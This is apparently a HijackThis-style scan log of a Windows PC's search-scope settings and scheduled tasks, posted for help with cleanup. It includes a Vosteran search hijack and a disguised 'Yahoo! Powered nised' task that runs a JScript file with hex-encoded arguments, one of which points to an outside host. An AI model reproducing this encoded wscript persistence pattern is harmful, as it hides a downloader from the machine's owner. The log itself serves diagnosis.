R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: [URL,TopResultURLFallback] = http://vosteran.com/results.php?f=4&q={searchTerms}&a=vst_ggfc_15_05_ch&cd=2XzuyEtN2Y1L1QzuyEyEyC0DyDyByCzztA0B0DtAyEyB0F0DtN0D0Tzu0StCtCtByCtN1L2XzutAtFyBtFtBtFtCtN1L1CzutCyEtBzytDyD1V1ByEtN1L1G1B1V1N2Y1L1Qzu2StC0C0EzzyByCyByBtG0CtB0B0FtGzz0DtByEtG0DyD0CtCtGyByEtAtD0EyByEyD0C0C0Czz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0FyEyCyE0DtAzzyEtGyBzz0E0AtGyE0DyB0CtGzyzztDzztGyDtByDtByCyCyDyC0D0EtC0F2Q&cr=642276483&ir= - Vosteran
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f}: [SuggestionsURLFallback] = http://clients5.google.com/complete/search?q={searchTerms}&hl={language}&gl={language}&client=ie8&mw={ie:maxWidth}&sh={ie:sectionHeight}&rh={ie:rowHeight}&inputencoding={inputEncoding}&outputencoding={outputEncoding} - Google
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f}: = https://www.google.com/search?tr...AppData\Roaming\Dropbox\bin\DropboxExt.22.dll

 

[uno_a_caso]

O22 - BITS Job: (download) {4A6CD66B-4E8C-463B-8E61-9A143688CF0E} - MicrosoftMapsBingGeoStore - (no URL)
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) P4GIntlCtrl.job - C:\Program Files\ASUS\P4G\IntlDPST.exe
O22 - Task (.job): (disabled) Yahoo! Powered nised.job - C:\WINDOWS\system32\wscript.exe
O22 - Task (.job): CCleanerCrashReporting.job - C:\Program Files\CCleaner\CCleanerBugReport.exe
O22 - Task (.job): Digital Sites.job - C:\Users\mf\AppData\Roaming\DigitalSites\UpdateProc\UPDATE~1.EXE (file missing)
O22 - Task (.job): ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
O22 - Task (.job): ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
O22 - Task: (damaged) C:\WINDOWS\System32\Tasks\OfficeSoftwareProtectionPlatform (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2656A780-720E-4E0B-9A30-048C0284DE86} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{293B9ACB-DB3C-4CA2-B6A6-48728505916E} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{43846AAA-9B88-40DD-B984-946F0BE4FC5B} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{43F606A6-6669-4580-8D1D-AD50DC99C03C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5A084105-D931-4010-8FFB-0577052329C8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5BC695F3-FEF4-4547-9CF5-EFB2F33C017E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{607E4B0E-67B1-4BEC-9C6A-961424A91DD1} - (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{607E4B0E-67B1-4BEC-9C6A-961424A91DD1} - \Microsoft\Windows\UNP\RunCampaignManager (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AABBF655-70FF-4744-A924-C2767758A259} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF5C64F5-F103-4C4A-B6A5-E4F7685CC07E} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B9A54542-CF68-41BC-8A4F-D10515D370EC} - \Microsoft\Windows\Setup\gwx\launchtrayprocess (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CA1CC55C-36A6-4F5B-A210-1593D897EE4E} - \OfficeSoftwareProtectionPlatform\SvcRestartTask (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D9E3F6F1-BA68-4A1C-9716-E4647503D4C8} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E61B1ED0-259A-4C4D-911C-90F41D0140ED} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig (no xml)
O22 - Tasks: (damaged) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (Microsoft) (user missing)
O22 - Tasks: (damaged) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -foScheduledTelemetryRun (Microsoft) (user missing)
O22 - Tasks: (disabled) \Agent Activation Runtime\S-1-5-21-1232614349-1706152515-3375908610-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\WINDOWS\System32\Autopilot.dll (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\WINDOWS\System32\Autopilot.dll (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\Media Center\PeriodicScanRetry - C:\WINDOWS\ehome\MCUpdate.exe -pscn 0 (file missing)
O22 - Tasks: (disabled) \Microsoft\Windows\Media Center\RecordingRestart - C:\WINDOWS\ehome\ehrec /RestartRecording (file missing)
O22 - Tasks: (disabled) \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor - {EA9155A3-8A39-40B4-8963-D3C761B18371} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask - {D2CBF5F7-5702-440B-8D8F-8203034A6B82},$(Arg0) - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\WindowsParentalControls - {DFA14C43-F385-4170-99CC-1B7765FA0E4A} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\WindowsParentalControlsMigration - {343D770D-7788-47C2-B62A-B7C4CED925CB} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\SideShow\AutoWake - {E51DFD48-AA36-4B45-BB52-E831F02E8316} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\SideShow\SessionAgent - {45F26E9E-6199-477F-85DA-AF1EDFE067B1} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\SideShow\SystemDataProviders - {7CCA6768-8373-4D28-8876-83E8B4E3A969} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Tasks: (disabled) Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Tasks: (disabled) ASUS Live Update - C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe
O22 - Tasks: (disabled) ASUS P4G - C:\Program Files\ASUS\P4G\BatteryLife.exe
O22 - Tasks: (disabled) ASUS Quick Gesture - C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x86\QuickGesture.exe
O22 - Tasks: (disabled) ASUS Quick Gesture (x64) - C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x64\QuickGesture64.exe
O22 - Tasks: (disabled) ASUS Smart Gesture Launcher - C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe
O22 - Tasks: (disabled) ASUS USB Charger Plus - C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
O22 - Tasks: (disabled) ATKOSD2 - C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
O22 - Tasks: (disabled) ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe --domain-id 4e00205a-2ab1-4423-8f77-cc25b82cde1d --caller winlogon-impersonate
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc (Microsoft)
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (Microsoft)
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -foScheduledTelemetryRun (Microsoft)
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaWallpaperAppDetect - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaWallpaperAppDetect (Microsoft)
O22 - Tasks: \AVAST Software\Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
O22 - Tasks: \AVAST Software\Overseer - C:\Program Files\Common Files\avast software\overseer\overseer.exe /from_scheduler:1
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem132.0.6833.0{C5F67527-F057-45B3-A77B-40CD7D9D13AB} - C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe --wake --system
O22 - Tasks: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O22 - Tasks: \Microsoft\Windows\AppListBackup\BackupNonMaintenance - {E0DCC2CC-3354-45F2-8914-519E07809082} - C:\WINDOWS\system32\AppListBackupLauncher.dll (Microsoft)
O22 - Tasks: \Microsoft\Windows\AppxDeploymentClient\UCPD velocity - C:\WINDOWS\system32\UCPDMgr.exe (Microsoft)
O22 - Tasks: \Microsoft\Windows\Clip\ClipESU - C:\WINDOWS\system32\clipesu.exe (Microsoft)
O22 - Tasks: \Microsoft\Windows\CloudRestore\Backup - {722D0F89-B69C-4700-AE8C-4A44350E4876},$(Arg0) - C:\WINDOWS\System32\CloudRestoreLauncher.dll (Microsoft)
O22 - Tasks: \Microsoft\Windows\ConsentUX\UnifiedConsent\UnifiedConsentSyncTask - {82AA0895-198A-4C1B-B2D1-C16894218AFB} - C:\WINDOWS\System32\unifiedconsent.dll (Microsoft)
O22 - Tasks: \Microsoft\Windows\Media Center\ActivateWindowsSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\ConfigureInternetTimeService - C:\WINDOWS\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\DispatchRecoveryTasks - C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\ehDRMInit - C:\WINDOWS\ehome\ehPrivJob.exe /DRMInit (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\InstallPlayReady - C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\mcupdate - C:\WINDOWS\ehome\mcupdate $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\mcupdate_scheduled - C:\WINDOWS\ehome\mcupdate -crl -hms -pscn 15 (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\MediaCenterRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -MediaCenterRecoveryTask (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -ObjectStoreRecoveryTask (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\OCURActivate - C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\OCURDiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PBDADiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PBDADiscoveryW1 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PBDADiscoveryW2 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PvrRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -PvrRecoveryTask (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PvrScheduleTask - C:\WINDOWS\ehome\mcupdate.exe -PvrSchedule (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\RegisterSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\ReindexSearchRoot - C:\WINDOWS\ehome\ehPrivJob.exe /DoReindexSearchRoot (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\SqlLiteRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -SqlLiteRecoveryTask (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\UpdateRecordPath - C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\MobilePC\HotStart - {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - (no file)
O22 - Tasks: \Microsoft\Windows\SideShow\GadgetManager - {FF87090D-4A9A-4F47-879B-29A80C355D61},$(Arg0) - (no file)
O22 - Tasks: \Microsoft\Windows\TabletPC\InputPersonalization - C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe (Microsoft)
O22 - Tasks: \Microsoft\Windows\Tcpip\IpAddressConflict1 - C:\WINDOWS\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (Microsoft)
O22 - Tasks: \Microsoft\Windows\Tcpip\IpAddressConflict2 - C:\WINDOWS\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (Microsoft)
O22 - Tasks: \Microsoft\Windows\WindowsUpdate\Refresh Group Policy Cache - {07369A67-07A6-4608-ABEA-379491CB7C46} - C:\Windows\System32\UpdatePolicy.dll (Microsoft)
O22 - Tasks: {085E5AE1-682E-4941-8059-CC6CEDDE3C29} - C:\WINDOWS\system32\pcalua.exe -a "C:\Users\mf\Downloads\eMule0.50a-Installer (2).exe" -d C:\Users\mf\Downloads
O22 - Tasks: {12BD7B1A-6388-4013-8AC1-1883FE47F70D} - c:\program files (x86)\mozilla firefox\firefox.exe http://ui.skype.com/ui/0/6.7.59.102/it/abandoninstall?page=tsProgressBar (file missing)
O22 - Tasks: {3C468AAC-74FF-4747-B9D1-910275B1F460} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (1).exe" -d C:\Users\mf\Downloads
O22 - Tasks: {595F7578-6091-4104-8C2C-3638A55FCA14} - c:\program files (x86)\mozilla firefox\firefox.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=6.7.0.102&LastError=12002 (file missing)
O22 - Tasks: {865AE5AF-4CD1-4557-B379-1514C9E2B671} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (5).exe" -d C:\Users\mf\Downloads
O22 - Tasks: {9783570B-C119-497B-9666-089FCACD6DAA} - C:\Windows\system32\pcalua.exe -a C:\Users\mf\Desktop\HiJackThis.exe -d C:\Users\mf\Desktop
O22 - Tasks: {B618187F-895E-4717-A6A2-8CBAD7BF869E} - c:\program files (x86)\mozilla firefox\firefox.exe http://ui.skype.com/ui/0/6.6.0.106/it/abandoninstall?source=lightinstaller&page=tsInstall (file missing)
O22 - Tasks: {C6509AC9-3829-4877-9816-6D7412C5D865} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (2).exe" -d C:\Users\mf\Downloads
O22 - Tasks: {F77EE82F-C7C7-45A3-8AF5-781029F12F97} - c:\program files (x86)\mozilla firefox\firefox.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=6.11.0.102&LastError=12002 (file missing)
O22 - Tasks: Avast Secure Browser Heartbeat Task (Hourly) - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --hourly
O22 - Tasks: Avast Secure Browser Heartbeat Task (Logon) - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --logon
O22 - Tasks: avastBCLRestartS-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (file missing)
O22 - Tasks: AvastBrowserProtectS-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowserProtect.exe --runonce
O22 - Tasks: AvastUpdateTaskMachineCore - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /c
O22 - Tasks: AvastUpdateTaskMachineUA - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /ua /installsource scheduler
O22 - Tasks: CCleaner Update - C:\Program Files\CCleaner\CCUpdate.exe
O22 - Tasks: CCleanerCrashReporting - C:\Program Files\CCleaner\CCleanerBugReport.exe --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --guid "8f20d0c8-27ca-4baa-89ab-59f35e93c5d7" --version "6.30.11385" --silent
O22 - Tasks: CCleanerSkipUAC - mf - C:\Program Files\CCleaner\CCleaner.exe $(Arg0)
O22 - Tasks: Digital Sites - C:\Users\mf\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE /Check (file missing)
O22 - Tasks: GarminUpdaterTask - C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe
O22 - Tasks: ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe --domain-id 4e00205a-2ab1-4423-8f77-cc25b82cde1d --caller scheduler-impersonate
O22 - Tasks: LaunchSignup - C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe frompopup (file missing)
O22 - Tasks: OneDrive Reporting Task-S-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Users\mf\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Tasks: SidebarExecute - C:\Program Files\Windows Sidebar\sidebar.exe (file missing)
O22 - Tasks: Yahoo! Powered nised - C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{7015B576-FA57-3FB0-7C91-A1F2E6D32A3C}\timo.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b37303135423537362d464135372d334642302d374339312d4131463245364433324133437d5c726f6465646f" "433a5c50726f6772616d446174615c7b37303135423537362d464135372d334642302d374339312d4131463245364433324133437d5c7261726f6c6963" "//B" "//E:jscript" "--IsErIk"
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Media Center\PeriodicScanRetry - C:\WINDOWS\ehome\MCUpdate.exe -pscn 0 (file missing)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Media Center\RecordingRestart - C:\WINDOWS\ehome\ehrec /RestartRecording (file missing)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor - {EA9155A3-8A39-40B4-8963-D3C761B18371} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask - {D2CBF5F7-5702-440B-8D8F-8203034A6B82},$(Arg0) - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Shell\WindowsParentalControls - {DFA14C43-F385-4170-99CC-1B7765FA0E4A} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Shell\WindowsParentalControlsMigration - {343D770D-7788-47C2-B62A-B7C4CED925CB} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\SideShow\AutoWake - {E51DFD48-AA36-4B45-BB52-E831F02E8316} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\SideShow\SessionAgent - {45F26E9E-6199-477F-85DA-AF1EDFE067B1} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\SideShow\SystemDataProviders - {7CCA6768-8373-4D28-8876-83E8B4E3A969} - (no file)
O22 - Tasks_Migrated: (disabled) Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Tasks_Migrated: (disabled) ASUS Live Update - C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe
O22 - Tasks_Migrated: (disabled) ASUS P4G - C:\Program Files\ASUS\P4G\BatteryLife.exe
O22 - Tasks_Migrated: (disabled) ASUS Quick Gesture - C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x86\QuickGesture.exe
O22 - Tasks_Migrated: (disabled) ASUS Quick Gesture (x64) - C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x64\QuickGesture64.exe
O22 - Tasks_Migrated: (disabled) ASUS Smart Gesture Launcher - C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe
O22 - Tasks_Migrated: (disabled) ASUS SmartLogon Console Sensor - C:\Program Files (x86)\ASUS\FaceLogon\sensorsrv.exe
O22 - Tasks_Migrated: (disabled) ASUS USB Charger Plus - C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
O22 - Tasks_Migrated: (disabled) GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Tasks_Migrated: (disabled) ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe --domain-id 4e00205a-2ab1-4423-8f77-cc25b82cde1d --caller winlogon-impersonate
O22 - Tasks_Migrated: \AVAST Software\Overseer - C:\Program Files\Common Files\avast software\overseer\overseer.exe /from_scheduler:1
O22 - Tasks_Migrated: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O22 - Tasks_Migrated: \Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner - C:\WINDOWS\system32\mitigationscanner.exe (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ActivateWindowsSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ConfigureInternetTimeService - C:\WINDOWS\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\DispatchRecoveryTasks - C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ehDRMInit - C:\WINDOWS\ehome\ehPrivJob.exe /DRMInit (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\InstallPlayReady - C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\mcupdate - C:\WINDOWS\ehome\mcupdate $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\mcupdate_scheduled - C:\WINDOWS\ehome\mcupdate -crl -hms -pscn 15 (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\MediaCenterRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -MediaCenterRecoveryTask (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -ObjectStoreRecoveryTask (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\OCURActivate - C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\OCURDiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PBDADiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PBDADiscoveryW1 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PBDADiscoveryW2 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PvrRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -PvrRecoveryTask (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PvrScheduleTask - C:\WINDOWS\ehome\mcupdate.exe -PvrSchedule (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\RegisterSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ReindexSearchRoot - C:\WINDOWS\ehome\ehPrivJob.exe /DoReindexSearchRoot (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\SqlLiteRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -SqlLiteRecoveryTask (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\UpdateRecordPath - C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\MobilePC\HotStart - {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - (no file)
O22 - Tasks_Migrated: \Microsoft\Windows\RemovalTools\MRT_ERROR_HB - C:\WINDOWS\system32\MRT.exe /EHB /HeartbeatFailure "SubmitHeartbeatReportData" /HeartbeatError "0x80072ee7"
O22 - Tasks_Migrated: \Microsoft\Windows\SideShow\GadgetManager - {FF87090D-4A9A-4F47-879B-29A80C355D61},$(Arg0) - (no file)
O22 - Tasks_Migrated: \Microsoft\Windows\SMB\UninstallSMB1ClientTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Client"
O22 - Tasks_Migrated: \Microsoft\Windows\SMB\UninstallSMB1ServerTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Server"
